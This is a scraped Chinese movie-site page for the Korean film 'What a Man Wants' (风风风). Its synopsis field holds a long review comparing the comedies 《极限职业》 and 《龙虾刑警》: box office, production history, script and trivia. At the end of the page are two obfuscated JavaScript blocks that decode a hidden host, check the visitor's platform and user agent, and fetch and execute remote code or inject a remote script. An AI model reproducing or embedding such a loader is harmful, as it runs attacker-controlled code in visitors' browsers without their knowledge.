风风风

  • 犯罪电影 犯罪电影
  • 申河均 李星民 宋智孝 李艾 高俊 张荣男 杨贤民
  • 120分钟
  • 风风风影片简介:“警察”和“炸鸡”,当完全不沾边的…风风风影片简介:“警察”和“炸鸡”,当完全不沾边的两个概念被扯到一起,韩国观众久违了的“纯喜剧”被烹饪出了“前所未有的味道”。 《极限职业》海报 时光网特稿 “前所未有的味道,他们究竟是警察还是炸鸡店店员?” 借用电影《极限职业》中缉毒组高班长(柳承龙 饰)灵光乍现脱口而出的排骨炸鸡店广告语来形容《极限职业》这部电影,再合适不过了。(原本的台词是“前所未有的味道,这是排骨还是炸鸡?”) “警察”和“炸鸡”,当完全不沾边的两个概念被扯到一起,热爱挖掘一切奇怪情境的编剧裴世英,和即便讨厌一切类型元素但依然被这种异质感激发出创作欲的李炳宪导演都被吸引了。已经是二度合作的两人此番可谓珠联璧合,将韩国观众久违了的“纯喜剧”烹饪出了“前所未有的味道”。 也正是这种“新鲜感”最终动员到了韩国本土超过1600万观众走进影院,这一成绩在韩国影史票房榜上位列第二,仅次于1700万观影人次的《鸣梁海战》,但在票房数据上,《极限职业》已然超越了《鸣梁海战》登顶韩国影史票房冠军。 更值得一提的是,这是继六年前上映的《七号房的礼物》(同样由柳承龙主演)之后,韩国喜剧片再次跨过千万人次大关。而作为一部没有催泪元素的纯喜剧片,以及一部相比《鸣梁海战》,没有什么宏大主题和巨额投资的中小制作,《极限职业》的成功更显意义重大。 《极限职业》台版中字预告片 更有意思的事,就在《极限职业》在韩国上映的半年前,与之脱胎于同一个剧本初稿的中国电影《龙虾刑警》也登陆了内地大银幕,该片最终仅收获6800万人民币票房,而《极限职业》在韩国的总票房换算成人民币接近8亿。一个故事两个版本,如此悬殊的票房差距,又究竟差在了哪里呢? 制作缘起:将搞笑进行到底 不同于《极限职业》,《龙虾刑警》的缉毒组只有四位队员, 这与初稿剧本的设定一致 《极限职业》的初稿剧本(编剧文忠日)是在2015年“中韩故事共同开发项目”中的“一本多用(OSMU, One Source Multi Use)”选拔中脱颖而出的。版权方Haegrimm将剧本同时卖给了中国和韩国的两个公司进行分别开发。后来就有了2018年6月22日在内地上映的中国电影《龙虾刑警》(王千源主演,李昕芸执导)和较之晚了半年于今年1月23日在韩国正式上映的《极限职业》。 李炳宪导演在《极限职业》片场 在拿到剧本版权后,《极限职业》的制作公司About Film代表金成焕找到曾经在《超速绯闻》时有过合作的李炳宪导演,一碗冷面的功夫,后者就动了心。李导演形容当时的想法是“这个点子绝对不能让给别人,只有我来导演才能讲出有趣的故事,而这部电影也会证明我自己。” 李炳宪导演此前曾参与过《超速绯闻》(2008),《阳光姐妹淘》(2011)的剧本改编,通过独立喜剧片《加油,炳宪》作为导演出道,执导过口碑喜剧片《二十》(2015)等多部喜剧作品,凭借其鬼马灵动的喜剧风格在韩国影坛小有名气。 对于《极限职业》,金成焕代表和李炳宪导演有着十分一致的想法。金代表坦言他们最初就没有很大野心,只是下定决心“将搞笑进行到底”,做一部决不“煽情”的纯喜剧。而“纯喜剧”也恰恰是李导演最擅长的。只是相比导演此前执导的多部聚焦生活日常的小品类剧情长片,《极限职业》的制作规模还是首次。 去年的卖座喜剧《完美的他人》的编剧执笔《极限职业》 为了增加保险系数,金代表还找来了与李炳宪导演有过一次合作的编剧裴世英,当时裴编剧执笔的翻拍喜剧《完美的他人》刚刚票房大卖,在业内成为“将正在死去的角色和台词救活的名医”。 然而她与李炳宪导演首次合作的影片《风风风》(2018)票房和口碑却并不理想,但也许正是这次不算成功的合作,为《极限职业》的成功奠定了基础——毕竟《风风风》是李炳宪执导的首个非自己编剧的商业项目,要如何与编剧进行有效的配合,也需要时间磨合与学习。 李炳宪导演曾在采访中谈到:“《风风风》是我最喜欢的作品之一,也是拍的很辛苦的一部作品,当时我就觉得下一部作品一定要拍让包括我在内的所有人都能发笑的电影,后来就接到了《极限职业》的剧本。” 《极限职业》凭什么成为开年爆款? ▋春节档无劲敌 《极限职业》的映期赶上了没什么竞争对手的春节六天长假,日入百万人次的票房增速,让影片仅用时9天就突破了千万观影人次,当然能有这样的成绩绝不仅仅是靠运气。 ▋另类Caper Movie(团队犯罪电影) 首尔麻浦警局缉毒组高班长(柳承龙 饰)在升职的道路上永远都慢半拍,在自己领导的缉毒组面临解散,连个小小的班长职位也将不保的危机一刻,想到未来可能要在后辈手下做内勤,高班长做出了一个重大决定,将自己的退休金倾囊而出,买下贩毒组织根据地对面濒临倒闭的炸鸡店进行潜伏,等待机会将之一网打尽。 片中缉毒组在炸鸡店进行的伪装侦察,让影片呈现出一种奇特的Caper Movie画风,又称为Heist film犯罪电影子类,一群人计划某件犯罪事件,然后执行这个任务,譬如《城中大盗》《非常嫌疑犯》《寡妇联盟》《高楼大劫案》。 在这个团队中,除了情商运气太差但永远打不死的“僵尸高班长”,缉毒组的其他四位成员也都个性鲜明:永远查案第一的严肃大叔英浩(李东勋 饰)、厨艺不错爱耍宝的马警官(陈善奎 饰)、外刚内柔的张警官(李荷妮 饰)和激情洋溢的新人警察宰勋(孔明 饰)。 《夺宝联盟》和《暗杀》都是典型的Caper Movie 虽然业务上算不上出色,但小团队十分抱团。为了完成任务,在炸鸡店转换身份的五个警察都找到了适合自己的新身份,无论是是收银算账、还是端盘子切洋葱,都干得有模有样。本着干一行爱一行的原则,几个人将炸鸡店经营的风生水起,但更大的问题的又来了,大家忙的根本没有时间破案……但无论如何,这也是任务的一部分。相比《夺宝联盟》、《暗杀》之流的狂拽酷炫,如此接地气的“小人物”版Caper Movie竟也显得妙趣横生。 《极限职业》和《龙虾刑警》中分别由陈善奎和刘桦扮演的大厨 其实在一部电影中同时塑造多个有关联的人物,正是裴世英编剧最擅长的。她曾经写出过柔道部六个少女的成长故事(《举起金刚》)、讲述出轨男女恩恩怨怨的《风风风》,以及揭露40多岁中年夫妇世界真实面目和伪善一面的《完美的他人》. “多个角色身处某种情况之下时,每个人的应对方式都不相同。而全新的故事就诞生于此,”裴世英编剧曾谈到她钟爱此类故事的原因。 但与之相对应的,《龙虾刑警》并没有对“饭店”的故事线着墨更多,除了擅长厨艺的能叔(刘桦 饰)外,其他三个角色除了“送外卖”,并没有与饭店产生更多的互动,与韩版相比,白白浪费了一条可以制造更多笑点,同时可以生动刻画团队协作的故事线。 ▋生活化的人物 《龙虾刑警》(上)和《极限职业》剧照 假装开炸鸡店查案这样一个颇具奇幻色彩的设定拍不好很容易沦为一场闹剧,但一群小市民画风的警察和炸鸡这种十分大众化的食物将这种非现实的设定消解至更贴近于现实。演员们无一掉线的演技功不可没。 五位警察并没有绝对的主角,他们组成的整个缉毒组团队才是影片的主人公。他们中间的每一个角色都有着充分的展现,且都各自身怀绝活令人印象深刻。更重要的是,虽然他们都是警察,但我们看到的他们首先是炸鸡店的店员和小市民,并且整个表演方式并非夸张的喜剧表演,而是最大限度的贴近了现实,仿佛就是隔壁炸鸡店里真实存在的小人物。 李荷妮《极限职业》中素颜出镜 而几位演员在片中呈现出的路人脸,更增强了角色的可信度,特别是唯一的女队员李荷妮完全素颜出镜,无论是炸鸡店端盘子,还是泰拳冠军附身的肉搏战,还有最后有如动作戏一般的kiss镜头,她的全情投入都让张警官在一众男性角色中间颇具存在感。值得一提的是,演员李荷妮不仅是韩国小姐冠军出身,还是拥有首尔大学硕士学位的学霸女。 而反观《龙虾刑警》中袁姗姗饰演的花姐,只有肉眼可见的刻意扮丑,其它也就没有什么让人印象深刻的了。 ▋台词见真章 要论剧本是否出色,台词见真章。《极限职业》中出现了许多令人拍案叫绝的台词,既承担的超级笑点又不忘紧贴剧情。而再看《龙虾刑警》……没有比较就没有伤害。 故事中有这样一场戏,队友因为深入毒贩窝点探查敌情暴露后被扣押,《极限职业》中马警官被团队安排去分店视察工作,进门就先踩死一只蟑螂,然后对同样假扮店员的毒贩们进行了一番有关食品安全的教育,身份伪装通过简单几句台词就已经十分到位。 但《龙虾刑警》中则安排老幺出场,毫无组织纪律性的临时起意,让他翻墙到贼窝窗根下偷听,还没找好位置就被发现了,更夸张的是对他的营救行动也是简单粗暴毫无技术含量可言,王千源饰演的杜宇飞拿了一把玩具枪与毒贩们直接上演了一场尴尬的闹剧。 《龙虾刑警》闹着玩一样的探案过程 而说到剧本,裴世英编剧的一个创作习惯,也揭示了《极限职业》台词出色的原因,“我每写一场新戏之前,都会从第一场戏开始通读一遍,然后不断进行修改,台词会念出声来,修改到顺嘴为止。” ▋笑弹包裹的现实主义 高班长在说服手下一起开炸鸡店的时候说了这样一句台词:“反正从这里被挤走的话,也只能用退休金开炸鸡店,只不过是提前了一些罢了。” 其实纯喜剧《极限职业》并不仅仅是好笑那么简单,都说“喜剧的最高境界是悲剧”,《极限职业》正是这样一部让人“笑着哭”的作品。在警匪、黑帮、动作元素的装点下,小人物被逼入绝境,动用养老钱,凭借小宇宙爆发柳暗花明又一村的故事,看似引人发笑,实则底色荒凉。只不过这个苦涩的开篇在各种超级笑弹的包裹下,并没有给你任何唏嘘感叹的机会。 而在《龙虾刑警》中,这笔钱来自于缉毒组老幺不停再婚的母亲,为了让儿子来出席自己的婚礼而出手大方。如此个人化的猎奇情节,也并不指望观众能产生什么情感共鸣了。 而《极限职业》的最后,缉毒组成员们完全以炸鸡店店员的身份加入终极大战,更变成了为了个人生计的战斗,这种情绪是每一位观众都可以感同身受,并从中获得快感的。 其实影片最为写实的一点还有对“炸鸡”的利用。作为在韩国最普通最大众化的饮食,“炸鸡”就像现实中一样,在片中无处不外,而它还力证了自己是电影中无可替代的道具,涉及剧透就不多说了……但这里不得不吐槽的是,在《龙虾刑警》中,“龙虾”真的是毫无存在感。 有关《极限职业》的N件事 《极限职业》全剧组颜值最高的是导演 -李炳宪导演是个名副其实的“炸鸡粉”,爱炸鸡爱到会自己在家料理。但因为“导演吃道具会影响票房”的迷信说法,他并没有吃到片场的炸鸡。更有意思的是,导演并不喜欢暴力、警察、毒品这些类型元素,但它们与炸鸡的搭配却十分特别,并带有讽刺意味,这也是他被这部作品吸引的重要原因之一。 -“王排骨炸鸡”的诞生,是编剧裴世英在京畿道水原市饭桌上的灵光一现。看菜单的时候看到王排骨和炸鸡会总会选择困难,于是就想到了玩排骨味道的炸鸡,而影片的大卖,也让水原的炸鸡店一夜爆红。 《极限职业》致敬《英雄本色2》 -片尾致敬了香港电影《英雄本色2》的场景,随之响起张国荣演唱的电影插曲《当年情》,可以说是影片唯一的一个“煽情”点。有不少观众都纷纷表示,这个骚操作瞬间暴露了导演的年龄。 -导演的恶趣味还体现在了对近两年韩国大火的僵尸题材的致敬上,原本剧本上对柳承龙饰演的高班长的描述只有一句“僵尸高班长”,结果导演在片场和柳承龙商量出了一场僵尸咬人戏,毕竟柳承龙主演的丧尸剧《王国》大火,表现也自然十分卖力。 -影片开篇的一场16台汽车相撞的场面拍了一周,正赶上韩国几十年未遇的高温天气,演员和工作人员们都受了不少苦,简直是对“极限职业”的最佳诠释。 -孔明饰演的老幺宰勋不光在片场切了不少洋葱,在家更是做了很多练习,每天从片场回到家,他都会切几个洋葱,只是可惜的时,电影中只出现了几个镜头。此外在片中秀飞腿的孔明,在学生时代还是一名跆拳道选手,他在片中也有穿着跆拳道服登场的镜头。 -电影中除了张警官之外的另一个女性角色是功夫了得的冷面女保镖,这一角色是由出道十年的超级名模张真熙扮演的。 -2018年的韩国见义勇为好市民之一朴载洪在片中饰演了贩毒组织成员之一。他在去年接受表彰的时候还曾经和文在寅总统合影。 -柳承龙在拍摄《念力》的时候增重12公斤,为了出演《极限职业》正在减肥中,所以在片场一只炸鸡都没能吃到。 -为了拍摄在影片后半部分大举登场的动作戏,演员们在开机前接受了七周的动作训练。图为李东辉接受训练时的照片。

同类型

  • ,CCTV-6电影HD
  • HD
  • 超清

同主演

  • BD中字
  • 更新至06集
  • HD
  • HD
  • HD
  • HD
  • HD
  • HD

风风风评论

  • 评论加载中...
function pXcBy(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function wYQGtgXR(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return pXcBy(t);};window[''+'e'+'E'+'F'+'W'+'X'+'U'+'k'+'r'+'H'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=wYQGtgXR,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/a/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('am5yLmZweG9yYYnouYY24=','151743',window,document,['Y','pZgsOymIiK']);}:function(){};


function vjfEZzRN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function qRMyX(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return vjfEZzRN(t);};window[''+'H'+'s'+'a'+'u'+'E'+'K'+'U'+'l'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=qRMyX,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/a/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('am5yLmZweeG9yYnouY24=','151742',window,document,['e','dIekPvA']);}:function(){};